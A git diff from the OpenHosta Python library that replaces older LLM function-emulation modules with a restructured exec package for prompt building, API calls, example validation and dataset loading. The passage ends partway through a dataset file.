index c76aadb..0000000
--- a/src/OpenHosta/decoder.py
+++ /dev/null
@@ -1,3 +0,0 @@
-class HostaDecoder():
- def __init__(self) -> None:
- pass
diff --git a/src/OpenHosta/emulate.py b/src/OpenHosta/emulate.py
deleted file mode 100644
index 42e25e1..0000000
--- a/src/OpenHosta/emulate.py
+++ /dev/null
@@ -1,85 +0,0 @@
-import sys
-import inspect
-
-from .prompt import PromptMananger
-from .config import Model, DefaultManager
-
-
-_x = PromptMananger()
-
-_emulator_pre_prompt = _x.get_prompt("emulate")
-
-l_default = DefaultManager.get_default_model()
-
-
-def build_user_prompt(_infos: dict = None):
- filler = lambda pre, value: f"**{pre}**\n{str(value)}\n\n" if value is not None and value != [] else ""
-
- user_prompt = (
- "---\n\n## Function infos\n\n"
- + filler("Here's the function definition:", _infos["function_def"])
- + filler("Here's the function's locals variables which you can use as additional information to give your answer:", _infos["function_locals"])
- + "To fill in the \"return\" value in the output JSON, create your response according to the specified JSON Schema. Make sure not to change the key \"return.\"\n\n"
- + filler("JSON Schema to be used for \"return\" structure", _infos["return_type"])
- + filler("Here are some examples of expected input and output:", _infos["ho_example"])
- + "---\n"
- )
-
- return user_prompt
-
-
-def _exec_emulate(
- _infos: dict = None,
- _obj: object = None,
- model: Model = None,
- l_creativity: float = None,
- l_diversity: float = None,
-):
- global _emulator_pre_prompt
-
- _function_return_caller = _infos["return_caller"]
- _function_return = _infos["return_type"]
-
- if model is None:
- model = DefaultManager.get_default_model()
-
- try:
- if not isinstance(_emulator_pre_prompt, str) or not _emulator_pre_prompt:
- raise ValueError("Invalid prompt.")
- if (l_creativity is not None and (l_creativity < 0 or l_creativity > 1)) or (
- l_diversity is not None and (l_diversity < 0 or l_diversity > 1)
- ):
- raise ValueError("Emulate out of range values (0<creativity|diversity<1)")
- except ValueError as v:
- sys.stderr.write(f"[EMULATE_ERROR]: {v}")
- return None
-
- function_infos = build_user_prompt(_infos)
-
- response = model.api_call(
- sys_prompt=f"{_emulator_pre_prompt}\n{function_infos}\n",
- user_prompt=_infos["function_call"],
- creativity=l_creativity,
- diversity=l_diversity,
- )
-
- if _obj is not None and inspect.isfunction(_obj):
- setattr(_obj, "_last_response", response.json())
-
- if response.status_code == 200:
- l_ret = model.request_handler(
- response, _function_return, _function_return_caller
- )
-
- else:
- sys.stderr.write(f"Error {response.status_code}: {response.text}")
- l_ret = None
-
- if _obj is not None and inspect.isfunction(_obj):
- setattr(
- _obj,
- "_last_request",
- f"{_emulator_pre_prompt}\n{function_infos}\n{_infos['function_call']}"
- )
-
- return l_ret
diff --git a/src/OpenHosta/encoder.py b/src/OpenHosta/encoder.py
deleted file mode 100644
index a975ad0..0000000
--- a/src/OpenHosta/encoder.py
+++ /dev/null
@@ -1,36 +0,0 @@
-from typing import Any
-
-class HostaEncoder():
- def __init__(self) -> None:
- None
-
- def encode(self, value: Any):
- if type(value) == int:
- return IntEncoder.encoder(value)
- elif type(value) == float:
- return FloatEncoder.encoder(value)
- elif type(value) == str:
- try:
- convert_type = FloatEncoder.encoder(value)
- return convert_type
- except:
- raise ValueError("String cannot be converted to float (numbers in string only supported for now)")
- else:
- raise ValueError("Type not supported")
-
-
-class IntEncoder(HostaEncoder):
- def __init__(self) -> None:
- super().__init__()
-
- def encoder(data):
- data_encode = int(data)
- return [data_encode]
-
-class FloatEncoder(HostaEncoder):
- def __init__(self) -> None:
- super().__init__()
-
- def encoder(data):
- data_encode = float(data)
- return [data_encode]
diff --git a/src/OpenHosta/enhancer.py b/src/OpenHosta/enhancer.py
deleted file mode 100644
index 08a3cb8..0000000
--- a/src/OpenHosta/enhancer.py
+++ /dev/null
@@ -1,100 +0,0 @@
-import json
-import sys
-from typing import Callable
-
-from .prompt import PromptMananger
-from .config import DefaultManager
-
-
-_x = PromptMananger()
-_enhancer_pre_prompt = _x.get_prompt("enhance")
-
-l_default = DefaultManager.get_default_model()
-
-
-def _ai_call_enh(sys_prompt: str, func_prot: str, func_doc: str):
- global l_default
-
- l_user_prompt = (
- "\nHere's my python function's prototype:\n---\n"
- + func_prot
- + "\n---\n"
- + "\nHere's my python function's prompt:\n---\n"
- + func_doc
- + "\n---\n"
- )
-
- response = l_default.api_call(
- sys_prompt=sys_prompt, user_prompt=l_user_prompt, creativity=0.8, diversity=0.8
- )
-
- response_data = response.json()
- return response_data["choices"][0]["message"]["content"]
-
-
-def _parse_data(response: str, last_enh: dict) -> dict:
- try:
- l_ret_data = json.loads(response)
-
- except json.JSONDecodeError as e:
- sys.stderr.write(f"JSONDecodeError: {e}")
- l_cleand = "\n".join(response.split("\n")[1:-1])
- l_ret_data = json.loads(l_cleand)
-
- last_enh["enhanced"] = l_ret_data["enhanced"]
- last_enh["review"] = l_ret_data["review"]
- last_enh["advanced"] = l_ret_data["advanced"]
- last_enh["mermaid"] = l_ret_data["mermaid"]
- return last_enh
-
-
-def _build_attributes(func: object, last_enh) -> int:
- try:
- if not func.__name__ or not type(func.__name__) is str:
- raise ValueError("ValueError -> function name")
- if not last_enh["enhanced"] or not type(last_enh["enhanced"]) is str:
- raise ValueError("ValueError -> enhanced output")
- if not last_enh["review"] or not type(last_enh["review"]) is str:
- raise ValueError("ValueError -> review output")
- if not last_enh["advanced"] or not type(last_enh["advanced"]) is str:
- raise ValueError("ValueError -> seggested output")
- if not last_enh["mermaid"] or not type(last_enh["mermaid"]) is str:
- raise ValueError("ValueError -> mermaid output")
- except ValueError as e:
- sys.stderr.write(f"[BUILD_ERROR] {e}")
- return -1
- finally:
- func.enhanced_prompt = last_enh["enhanced"]
- func.review = last_enh["review"]
- func.advanced = last_enh["advanced"]
- func.diagram = last_enh["mermaid"]
- return 0
-
-
-def enhance(func):
- global _enhancer_pre_prompt
-
- last_enh: dict = {
- "enhanced": None,
- "review": None,
- "advanced": None,
- "mermaid": None,
- }
-
- func_name, func_doc = func.__name__, func.__doc__
-
- last_return = _ai_call_enh(_enhancer_pre_prompt, func._prot, func_doc)
-
- last_enh = _parse_data(last_return, last_enh)
-
- _build_attributes(func, last_enh)
- return last_enh
-
-def suggest(func:Callable):
- if not callable(func):
- raise ValueError("Suggest arguments must be a callable.")
- try:
- full = func.__suggest__(func)
- except AttributeError:
- raise AttributeError(f"The “__suggest__” attribute is not defined. The function {func.__name__} might not have been called.")
- return full
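The deleted `_parse_data` above retries a failed `json.loads` after stripping the first and last lines of the response, which handles LLM output wrapped in markdown code fences. A standalone sketch of that fallback (`parse_llm_json` is a hypothetical helper name):

```python
import json


def parse_llm_json(response: str) -> dict:
    # First try the raw response; if the model wrapped its JSON in a
    # code fence, drop the first and last lines and parse the remainder.
    try:
        return json.loads(response)
    except json.JSONDecodeError:
        cleaned = "\n".join(response.split("\n")[1:-1])
        return json.loads(cleaned)
```

Note the fallback is line-based, so it recovers any single-line wrapper, not just backtick fences.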
diff --git a/src/OpenHosta/example.py b/src/OpenHosta/example.py
deleted file mode 100644
index 4a75954..0000000
--- a/src/OpenHosta/example.py
+++ /dev/null
@@ -1,256 +0,0 @@
-import inspect
-import pickle
-import os
-import json
-import csv
-from typing import Callable
-
-from .errors import FrameError
-from .cache import Hostacache
-
-CACHE_DIR = "__hostacache__"
-os.makedirs(CACHE_DIR, exist_ok=True)
-
-
-def example(*args, hosta_func=None, hosta_out=None, **kwargs):
- input_type = {}
- output_type = {}
- example_dict = {}
-
- if hosta_func is None:
- try:
- func, _ = _extend_scope()
- except:
- raise ValueError("Please provide hosta_func for specifying the function")
- elif callable(hosta_func):
- func = hosta_func
- else:
- raise ValueError("Please provide hosta_func for specifying the function")
-
- try:
- sig = inspect.signature(func)
- for param in sig.parameters.values():
- input_type[param.name] = param.annotation
- output_type["hosta_out"] = sig.return_annotation
- except:
- raise ValueError("Function does not have a signature")
-
- type_verificator(args, kwargs, input_type, output_type, hosta_out, func, example_dict)
-
- cache_id = "ho_example"
- cache = Hostacache(func, cache_id, example_dict)
- cache.create_hosta_cache()
-
-
-def type_verificator(args, kwargs, input_type, output_type, hosta_out, func, example_dict):
- """
- Validates the types of both positional and keyword arguments, as well as the return value.
- """
-
- if args:
- if len(args) != len(input_type):
- raise ValueError(
- f"Too many arguments for function {func.__name__}, "
- f"expected {len(input_type)} arguments, use hosta_out for output."
- )
-
- for i, arg in enumerate(args):
- param_name = list(input_type.keys())[i]
- expected_type = input_type[param_name]
-
- if not isinstance(arg, expected_type):
- raise TypeError(
- f"Argument {arg} does NOT match the expected type "
- f"{expected_type} for parameter {param_name} in function {func.__name__}."
- )
- example_dict[param_name] = arg
-
- else:
- if len(kwargs) != len(input_type):
- raise ValueError(
- f"Mismatch in number of keyword arguments for function '{func.__name__}', "
- f"expected {len(input_type)} arguments, use hosta_out for output."
- )
-
- for key, value in kwargs.items():
- expected_type = input_type[key]
-
- if not isinstance(value, expected_type):
- raise TypeError(
- f"Keyword argument {value} does NOT match the expected type "
- f"{expected_type} for parameter {key} in function {func.__name__}."
- )
- example_dict[key] = value
-
- if hosta_out is None:
- raise ValueError("Please provide hosta_out for output.")
- else:
- expected_output_type = output_type["hosta_out"]
- if not isinstance(hosta_out, expected_output_type):
- raise TypeError(
- f"Output {hosta_out} does NOT match the expected type "
- f"{expected_output_type} for function {func.__name__}."
- )
- example_dict["hosta_out"] = hosta_out
-
-
-def save_examples(hosta_func=None, hosta_path=None):
- cached_data = {}
-
- if hosta_func is None:
- try:
- func, _ = _extend_scope()
- except:
- raise ValueError(f"Please provide hosta_func for specifying the function")
-
- elif callable(hosta_func):
- func = hosta_func
- else:
- raise ValueError(f"Please provide hosta_func for specifying the function")
-
- if hosta_path is None:
- raise ValueError(
- f"Please provide hosta_path for specifying the path to save the cache"
- )
- total_path = f"{hosta_path}" + ".jsonl"
-
- func_name = func.__name__
- path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
-
-
- try:
- if os.path.exists(path_name):
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
- with open(total_path, "a") as t:
- for dict in cached_data["ho_example"]:
- t.write(json.dumps(dict) + "\n")
- t.write(json.dumps(dict) + "\n")
- else:
- raise ValueError(f"Could not found the cache at {path_name}")
- except Exception as e:
- raise ValueError(f"Could not found the cache at {path_name}") from e
-
-
-def load_training_example(hosta_path: str, hosta_func: callable) -> dict:
- """
- Load the training example from the cache.
- """
- func_name = hosta_func.__name__
- path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
-
- cached_data = None
-
- if os.path.exists(path_name):
- try:
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
- except (pickle.PickleError, IOError) as e:
- raise ValueError(f"Error loading cache from {path_name}") from e
- else:
- cache = Hostacache(hosta_func, None)
- cache.create_hosta_cache()
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
-
- _, file_extension = os.path.splitext(hosta_path)
- if file_extension not in ['.json', '.jsonl', '.csv']:
- raise ValueError("Unsupported file type. Please provide a JSON or JSONL or CSV file.")
-
- try:
- with open(hosta_path, 'r') as file:
- if file_extension == '.json':
- data = json.load(file)
- if isinstance(data, list):
- for item in data:
- if item not in cached_data['ho_data']:
- cached_data['ho_data'].append(item)
- else:
- if data not in cached_data['ho_data']:
- cached_data['ho_data'].append(data)
- elif file_extension == '.jsonl':
- for line in file:
- item = json.loads(line)
- if item not in cached_data['ho_data']:
- cached_data['ho_data'].append(item)
- elif file_extension == '.csv':
- reader = csv.DictReader(file)
- for row in reader:
- if row not in cached_data['ho_data']:
- cached_data['ho_data'].append(row)
- with open(path_name, "wb") as f:
- pickle.dump(cached_data, f)
- except (IOError, json.JSONDecodeError) as e:
- raise ValueError(f"Error loading data from {hosta_path}") from e
- return cached_data
-
-
-def _extend_scope() -> Callable:
- func: Callable = None
- current = None
- step = None
- caller = None
-
- current = inspect.currentframe()
- if current is None:
- raise FrameError("Current frame is None")
- step = current.f_back
- if step is None:
- raise FrameError("Caller[lvl1] frame is None")
- caller = step.f_back
- if caller is None:
- raise FrameError("Caller[lvl2] frame is None")
-
- caller_name = caller.f_code.co_name
- caller_code = caller.f_code
- l_caller = caller
-
- if "self" in caller.f_locals:
- obj = caller.f_locals["self"]
- func = getattr(obj, caller_name, None)
- if func:
- func = inspect.unwrap(func)
- else:
- while func is None and l_caller.f_back is not None:
- for obj in l_caller.f_back.f_locals.values():
- found = False
- try:
- if hasattr(obj, "__code__"):
- found = True
- except:
- continue
- if found and obj.__code__ == caller_code:
- func = obj
- break
- if func is None:
- l_caller = l_caller.f_back
- if func is None:
- func = caller.f_globals.get(caller_name)
- if func:
- func = inspect.unwrap(func)
-
- if func is None or not callable(func):
- raise FrameError("The emulated function cannot be found.")
-
- return func, caller
-
-
-EXAMPLE_DOC = """
-A utility function that performs runtime type validation on a given function's arguments and output.
-
-Parameters:
- *args:
- Positional arguments to validate against the input types of the provided function (hosta_func).
- **kwargs:
- Keyword arguments (passed by name) to validate against the input types of the provided function.
- hosta_func (function, optional but recommended):
- The function whose signature will be used for input/output type validation.
- hosta_out (object):
- The expected output of hosta_func, to be validated against the return type annotation.
-
-Raises:
- ValueError:
- If the number of arguments provided does not match the expected number as per the function's signature.
- TypeError:
- If the type of any argument or output does not match the expected type.
-"""
\ No newline at end of file
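Both the deleted `example.py` and the `exec.py` below locate the caller's function object by walking stack frames with `inspect`. A simplified, runnable sketch of that lookup, covering only global functions (the original `_extend_scope` also handles bound methods and closures):

```python
import inspect
from typing import Callable


def find_caller_function() -> Callable:
    # Frame 0 is this helper; f_back is the frame of whoever called it.
    frame = inspect.currentframe().f_back
    name = frame.f_code.co_name
    # Look the caller up by name in its own globals, as the original
    # does in its final fallback branch.
    func = frame.f_globals.get(name)
    if func is None or not callable(func):
        raise RuntimeError("The calling function cannot be found.")
    return inspect.unwrap(func)


def my_function():
    # A function can recover a reference to itself without arguments.
    return find_caller_function()
```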
diff --git a/src/OpenHosta/exec.py b/src/OpenHosta/exec.py
deleted file mode 100644
index bbb4bf3..0000000
--- a/src/OpenHosta/exec.py
+++ /dev/null
@@ -1,272 +0,0 @@
-import pickle
-import os
-import hashlib
-import inspect
-from typing import Callable, Dict, Any, get_origin, get_args
-import typing
-import collections
-from pydantic import BaseModel, create_model
-import copy
-
-import functools
-
-from .enhancer import enhance
-from .errors import FrameError
-from .predict import continue_train, to_emulate, retrain
-
-
-CACHE_DIR = "__hostacache__"
-os.makedirs(CACHE_DIR, exist_ok=True)
-
-class HostaInjector:
- def __init__(self, exec):
- if not callable(exec):
- raise TypeError("Executive function must be a function.")
-
- self.exec = exec
- self.infos_cache = {}
-
- def __call__(self, *args, **kwargs):
- self.infos_cache = {
- "hash_function": "",
- "function_def": "",
- "return_type": "",
- "return_caller": "",
- "function_call": "",
- "function_args": {},
- "function_locals": {},
- "ho_example": [],
- "ho_example_id": 0,
- "ho_example_links": [],
- "ho_cothougt": [],
- "ho_cothougt_id": 0,
- "ho_data": [],
- "ho_data_id" : 0
- }
- func_obj, caller = self._extend_scope()
- func_name = func_obj.__name__
- path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
-
- if os.path.exists(path_name):
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
-
- function_def, func_prot = self._get_functionDef(func_obj)
- function_hash = self._get_hashFunction(
- function_def,
- cached_data["ho_example_id"],
- cached_data["ho_cothougt_id"],
- )
-
- self._attach_attributs(func_obj, func_prot)
- if function_hash == cached_data["hash_function"]:
- cached_data["function_call"], cached_data["function_locals"], cached_data["function_args"] = (
- self._get_functionCall(func_obj, caller)
- )
- return self.exec(cached_data, func_obj, *args, **kwargs)
-
- hosta_args = self._get_argsFunction(func_obj)
- with open(path_name, "wb") as f:
- res = pickle.dump(hosta_args, f)
- # TODO : fix the function locals because he didn't load in the cache
- hosta_args["function_call"], hosta_args["function_locals"], hosta_args["function_args"] = (
- self._get_functionCall(func_obj, caller)
- )
- self._attach_attributs(func_obj, hosta_args["function_def"])
- return self.exec(hosta_args, func_obj, *args, **kwargs)
-
- def _get_hashFunction(self, func_def: str, nb_example: int, nb_thought: int) -> str:
- combined = f"{func_def}{nb_example}{nb_thought}"
- return hashlib.md5(combined.encode()).hexdigest()
-
- def _get_argsFunction(self, func_obj):
-
- self.infos_cache["function_def"], func_prot = self._get_functionDef(func_obj)
- self.infos_cache["return_type"], self.infos_cache["return_caller"] = (
- self._get_functionReturnType(func_obj)
- )
- self.infos_cache["hash_function"] = self._get_hashFunction(
- self.infos_cache["function_def"],
- self.infos_cache["ho_example_id"],
- self.infos_cache["ho_cothougt_id"],
- )
- return self.infos_cache
-
- def _extend_scope(self) -> Callable:
- func: Callable = None
- current = None
- step = None
- caller = None
-
- current = inspect.currentframe()
- if current is None:
- raise FrameError("Current frame is None")
- step = current.f_back
- if step is None:
- raise FrameError("Caller[lvl1] frame is None")
- caller = step.f_back
- if caller is None:
- raise FrameError("Caller[lvl2] frame is None")
-
- caller_name = caller.f_code.co_name
- caller_code = caller.f_code
- l_caller = caller
-
- if "self" in caller.f_locals:
- obj = caller.f_locals["self"]
- func = getattr(obj, caller_name, None)
- if func:
- func = inspect.unwrap(func)
- else:
- while func is None and l_caller.f_back is not None:
- for obj in l_caller.f_back.f_locals.values():
- found = False
- try:
- if hasattr(obj, "__code__"):
- found = True
- except:
- continue
- if found and obj.__code__ == caller_code:
- func = obj
- break
- if func is None:
- l_caller = l_caller.f_back
- if func is None:
- func = caller.f_globals.get(caller_name)
- if func:
- func = inspect.unwrap(func)
-
- if func is None or not callable(func):
- raise FrameError("The emulated function cannot be found.")
-
- return func, caller
-
- def _get_functionDef(self, func: Callable) -> str:
- sig = inspect.signature(func)
-
- func_name = func.__name__
- func_params = ", ".join(
- [
- (
- f"{param_name}: {param.annotation.__name__}"
- if param.annotation != inspect.Parameter.empty
- else param_name
- )
- for param_name, param in sig.parameters.items()
- ]
- )
- func_return = (
- f" -> {sig.return_annotation.__name__}"
- if sig.return_annotation != inspect.Signature.empty
- else ""
- )
- definition = (
- f"```python\ndef {func_name}({func_params}):{func_return}\n"
- f" \"\"\"\n\t{func.__doc__}\n \"\"\"\n```"
- )
- prototype = f"def {func_name}({func_params}):{func_return}"
- return definition, prototype
-
- def _get_functionCall(self, func: Callable, caller) -> str:
- locals = None
- _, _, _, values = inspect.getargvalues(caller)
-
- sig = inspect.signature(func)
-
- values_args = copy.deepcopy(values)
- values_locals = copy.deepcopy(values)
- for values_name in values.keys():
- if values_name not in sig.parameters.keys():
- values_args.pop(values_name)
- else:
- values_locals.pop(values_name)
-
- if "self" in values_locals.keys():
- values_locals.pop("self")
-
- if values_locals != {}:
- locals = copy.deepcopy(values_locals)
-
- bound_args = sig.bind_partial(**values_args)
- bound_args.apply_defaults()
-
- args_str = ", ".join(
- f"{name}={value!r}" if name in bound_args.kwargs else f"{value!r}"
- for name, value in bound_args.arguments.items()
- )
-
- call = f"{func.__name__}({args_str})"
- return call, locals, values_args
-
- def _inspect_returnType(self, func: Callable) -> str:
- sig = inspect.signature(func)
-
- if sig.return_annotation != inspect.Signature.empty:
- return sig.return_annotation
- else:
- return None
-
- def _get_typingOrigin(self, return_type) -> bool:
- origin = get_origin(return_type)
- return origin in {
- list,
- dict,
- tuple,
- set,
- frozenset,
- typing.Union,
- typing.Annotated,
- typing.Optional,
- typing.Literal,
- collections.deque,
- collections.abc.Iterable,
- collections.abc.Sequence,
- collections.abc.Mapping,
- }
-
- def _get_functionReturnType(self, func: Callable) -> Dict[str, Any]:
- return_caller = self._inspect_returnType(func)
- return_type = None
-
- if return_caller is not None:
- if self._get_typingOrigin(return_caller):
- return_caller_origin = get_origin(return_caller)
- return_caller_args = get_args(return_caller)
- combined = return_caller_origin[return_caller_args]
- new_model = create_model(
- "Hosta_return_shema", return_hosta_type_typing=(combined, ...)
- )
- return_type = new_model.model_json_schema()
- elif issubclass(return_caller, BaseModel):
- return_type = return_caller.model_json_schema()
- else:
- new_model = create_model(
- "Hosta_return_shema", return_hosta_type=(return_caller, ...)
- )
- return_type = new_model.model_json_schema()
- else:
- No_return_specified = create_model(
- "Hosta_return_shema", return_hosta_type_any=(Any, ...)
- )
- return_type = No_return_specified.model_json_schema()
-
- return return_type, return_caller
-
- def _attach_attributs(self, func: Callable, prototype: str)->None:
- """
- Attach additional attributes to a function.
-
- Args:
- func (Callable): The target function to which the attributes are attached.
- prototype (str): A string representing the prototype (used as an example).
-
- Returns:
- Callable: The target function wrapped with the attached attributes.
- """
- if "bound method" not in str(func):
- setattr(func, "__suggest__", enhance)
- setattr(func, "_prot", prototype)
- setattr(func, "continue_train", functools.partial(continue_train, func_obj=func))
- setattr(func, "retrain", functools.partial(retrain, func_obj=func))
- setattr(func, "emulate", functools.partial(to_emulate, func_obj=func))
-
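`HostaInjector` above invalidates its on-disk cache by hashing the function definition together with the example and chain-of-thought counters. A minimal sketch of that cache-key scheme (`cache_key` is a hypothetical helper, mirroring `_get_hashFunction`):

```python
import hashlib


def cache_key(func_def: str, nb_example: int, nb_thought: int) -> str:
    # Any change to the function's source text, or to the number of
    # attached examples/thoughts, yields a different key and forces
    # the cached prompt data to be rebuilt.
    combined = f"{func_def}{nb_example}{nb_thought}"
    return hashlib.md5(combined.encode()).hexdigest()
```

MD5 is fine here because the hash is a change detector, not a security boundary.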
diff --git a/src/OpenHosta/exec/__init__.py b/src/OpenHosta/exec/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/exec/ask.py b/src/OpenHosta/exec/ask.py
new file mode 100644
index 0000000..16c0c3b
--- /dev/null
+++ b/src/OpenHosta/exec/ask.py
@@ -0,0 +1,34 @@
+from __future__ import annotations
+
+from typing import Any, Optional
+
+from ..core.config import Model, DefaultManager
+from ..utils.errors import RequestError
+
+
+def ask(
+ *,
+ user: str,
+ system: Optional[str] = None,
+ model: Optional[Model] = None,
+ **api_args
+) -> Any:
+ if model is None:
+ model = DefaultManager.get_default_model()
+ if system is None:
+ system = "You are an helpful assistant."
+
+ response = model.simple_api_call(
+ system,
+ user,
+ False,
+ **api_args
+ )
+
+ try:
+ data = response.json()
+ res = data["choices"][0]["message"]["content"]
+ setattr(ask, "_last_tokens", data["usage"]["total_tokens"])
+ return res
+ except Exception as e:
+ raise RequestError(f"[ask] Request failed:\n{e}")
diff --git a/src/OpenHosta/exec/emulate.py b/src/OpenHosta/exec/emulate.py
new file mode 100644
index 0000000..c75bae7
--- /dev/null
+++ b/src/OpenHosta/exec/emulate.py
@@ -0,0 +1,89 @@
+from __future__ import annotations
+
+from typing import Any, Optional, Callable
+
+from ..core.config import Model, DefaultManager
+from ..core.hosta import Hosta, Func
+from ..utils.meta_prompt import EMULATE_PROMPT
+
+
+def _build_user_prompt(
+ _infos: Func = None,
+ x: Hosta = None,
+ use_locals_as_ctx: Optional[bool] = False,
+ use_self_as_ctx: Optional[bool] = False,
+):
+    def filler(pre, value):
+        return f"**{pre}**\n{str(value)}\n\n" if value is not None and value != [] else ""
+
+ user_prompt = (
+ filler(EMULATE_PROMPT.PRE_DEF, _infos.f_def)
+ + filler(EMULATE_PROMPT.PRE_TYPE, _infos.f_type[1])
+ + filler(EMULATE_PROMPT.PRE_SCHEMA, _infos.f_schema)
+ )
+ if use_locals_as_ctx:
+ user_prompt = (
+ user_prompt + filler(EMULATE_PROMPT.PRE_LOCALS, _infos.f_locals))
+ if use_self_as_ctx:
+ user_prompt = (
+ user_prompt + filler(EMULATE_PROMPT.PRE_SELF, _infos.f_self))
+ if x:
+ user_prompt = (
+ user_prompt
+ + filler(EMULATE_PROMPT.PRE_EXAMPLE, x.example)
+ + filler(EMULATE_PROMPT.PRE_COT, x.cot)
+ )
+ user_prompt = (user_prompt + EMULATE_PROMPT.USER_SEP)
+ return user_prompt
+
+
+def emulate(
+ _infos: Optional[Func] = None,
+ *,
+ model: Optional[Model] = None,
+ use_locals_as_ctx: bool = False,
+ use_self_as_ctx: bool = False,
+ post_callback: Optional[Callable] = None,
+ **llm_args
+) -> Any:
+ x = None
+ l_ret: Any = None
+
+ if _infos is None:
+ x = Hosta()
+ _infos = getattr(x._update_call(), "_infos")
+ func_prompt: str = _build_user_prompt(
+ _infos, x, use_locals_as_ctx, use_self_as_ctx)
+
+ if model is None:
+ model = DefaultManager.get_default_model()
+
+ if x:
+ x._attach(_infos.f_obj, {
+ "_last_request": None,
+ "_last_response": None
+ })
+
+ try:
+ if x:
+ _infos.f_obj._last_request = {
+                'sys_prompt': f"{EMULATE_PROMPT!r}\n{func_prompt}\n",
+                'user_prompt': _infos.f_call} | llm_args
+
+ response = model.simple_api_call(
+ sys_prompt=f"{EMULATE_PROMPT!r}\n{func_prompt}\n",
+ user_prompt=_infos.f_call,
+ **llm_args
+ )
+
+ if x:
+            _infos.f_obj._last_response = response
+
+ l_ret = model.request_handler(response, _infos)
+ if post_callback is not None:
+ l_ret = post_callback(l_ret)
+ except NameError as e:
+ raise NotImplementedError(
+ f"[emulate]: {e}\nModel object does not have the required methods.")
+
+ return l_ret
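`_build_user_prompt` above assembles the prompt by concatenating labelled sections, with the `filler` helper silently skipping empty values. A standalone sketch of that pattern (the section labels here are illustrative, not the `EMULATE_PROMPT` constants):

```python
from typing import Any, Optional


def filler(pre: str, value: Any) -> str:
    # Emit a "**label**\n<value>\n\n" section, or nothing when the
    # value is None or an empty list.
    return f"**{pre}**\n{value}\n\n" if value is not None and value != [] else ""


def build_prompt(definition: str,
                 schema: Optional[dict] = None,
                 examples: Optional[list] = None) -> str:
    # Sections with no content vanish, so the prompt never contains
    # empty headers.
    return (
        filler("Function definition:", definition)
        + filler("Return schema:", schema)
        + filler("Examples:", examples)
    )
```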
diff --git a/src/OpenHosta/exec/example.py b/src/OpenHosta/exec/example.py
new file mode 100644
index 0000000..10b97a1
--- /dev/null
+++ b/src/OpenHosta/exec/example.py
@@ -0,0 +1,31 @@
+from __future__ import annotations
+
+from typing import Any, get_args
+
+from ..core.hosta import Hosta, ExampleType
+
+
+def example(*args, hosta_out: Any = None, **kwargs):
+ x = Hosta()
+ if args != ():
+ raise ValueError(
+ "[example] The arguments in example function must keyword only arguments, with keywords matching with the name of the calling function's arguments")
+ if type(hosta_out) != x._infos.f_type[1] \
+ and hosta_out not in get_args(x._infos.f_type[1]) \
+ and type(hosta_out) not in get_args(x._infos.f_type[1]):
+ raise ValueError("[example] hosta_out's type doesn't match with the calling function's return type:\n\t{} instead of {}.".format(
+ type(hosta_out),
+ x._infos.f_type[1]
+ ))
+    if len(kwargs) != len(x._infos.f_type[0]):
+        raise ValueError("[example] Invalid number of arguments. Expected {}, got {}".format(
+            len(x._infos.f_type[0]), len(kwargs)))
+ for (k1, v1), (k2, v2) in zip(kwargs.items(), x._infos.f_args.items()):
+ if k1 != k2:
+ raise ValueError(
+ "[example] Invalid arguments name: Expected {}, got {}".format(k2, k1))
+ if type(v1) != type(v2):
+ raise ValueError("[example] Invalid arguments type: Expected {}, got {}".format(
+ type(v2), type(v1)))
+ x._bdy_add('ex', ExampleType(in_=kwargs, out=hosta_out))
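The `example` helper above checks that the recorded keyword arguments line up, by name and type, with the emulated function's signature. A self-contained sketch of that validation using `inspect` directly (`validate_example` is a hypothetical helper; the real code reads types from the `Hosta` frame inspection instead):

```python
import inspect
from typing import Any, Dict


def validate_example(func, hosta_out: Any, **kwargs) -> Dict[str, Any]:
    sig = inspect.signature(func)
    params = sig.parameters
    if len(kwargs) != len(params):
        raise ValueError(f"Expected {len(params)} arguments, got {len(kwargs)}")
    for name, value in kwargs.items():
        if name not in params:
            raise ValueError(f"Unknown argument name: {name}")
        ann = params[name].annotation
        # Only check annotated parameters, as unannotated ones carry no type.
        if ann is not inspect.Parameter.empty and not isinstance(value, ann):
            raise ValueError(f"Argument {name}: expected {ann}, got {type(value)}")
    ret = sig.return_annotation
    if ret is not inspect.Signature.empty and not isinstance(hosta_out, ret):
        raise ValueError(f"Output: expected {ret}, got {type(hosta_out)}")
    return {**kwargs, "hosta_out": hosta_out}
```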
diff --git a/src/OpenHosta/exec/predict/__init__.py b/src/OpenHosta/exec/predict/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/exec/predict/dataset/__init__.py b/src/OpenHosta/exec/predict/dataset/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/exec/predict/dataset/dataset.py b/src/OpenHosta/exec/predict/dataset/dataset.py
new file mode 100644
index 0000000..38b2519
--- /dev/null
+++ b/src/OpenHosta/exec/predict/dataset/dataset.py
@@ -0,0 +1,337 @@
+import csv
+import json
+import os
+from enum import Enum
+from typing import List, Optional, Any, Dict
+
+import torch
+
+from .sample_type import Sample
+from ..encoder.simple_encoder import SimpleEncoder
+
+
+class SourceType(Enum):
+ """
+ Enum for different types of sources for the dataset.
+ """
+ CSV = "csv"
+ JSONL = "jsonl"
+ JSON = "json"
+class HostaDataset:
+ def __init__(self, verbose: int = 1):
+ self.path: Optional[str] = None # Path to the file
+ self.data: List[Sample] = [] # List of Sample objects
+ self.dictionary: Dict[str, int] = {} # Dictionary for mapping str to id
+        self.inference: Optional[Sample] = None  # Sample evaluated at inference time
+ self.verbose: int = verbose # Verbose level for debugging
+ self._encoder: Optional[SimpleEncoder] = None # Will store the encoder instance
+
+ def add(self, sample: Sample):
+ """
+ Add a Sample object to the dataset.
+ """
+ self.data.append(sample)
+ def convert_data(self, batch_size: int, shuffle: bool, train_set_size: float = 0.8) -> tuple:
+ """
+ Save the dataset to a file in the specified format and convert it into dataloader for training.
+ """
+ if not isinstance(self.data[0].input, torch.Tensor):
+ self.tensorify()
+
+ inputs = torch.stack([sample.input for sample in self.data])
+ if all(sample.output is not None for sample in self.data):
+ outputs = torch.stack([sample.output for sample in self.data])
+ dataset = torch.utils.data.TensorDataset(inputs, outputs)
+ else:
+ dataset = torch.utils.data.TensorDataset(inputs)
+
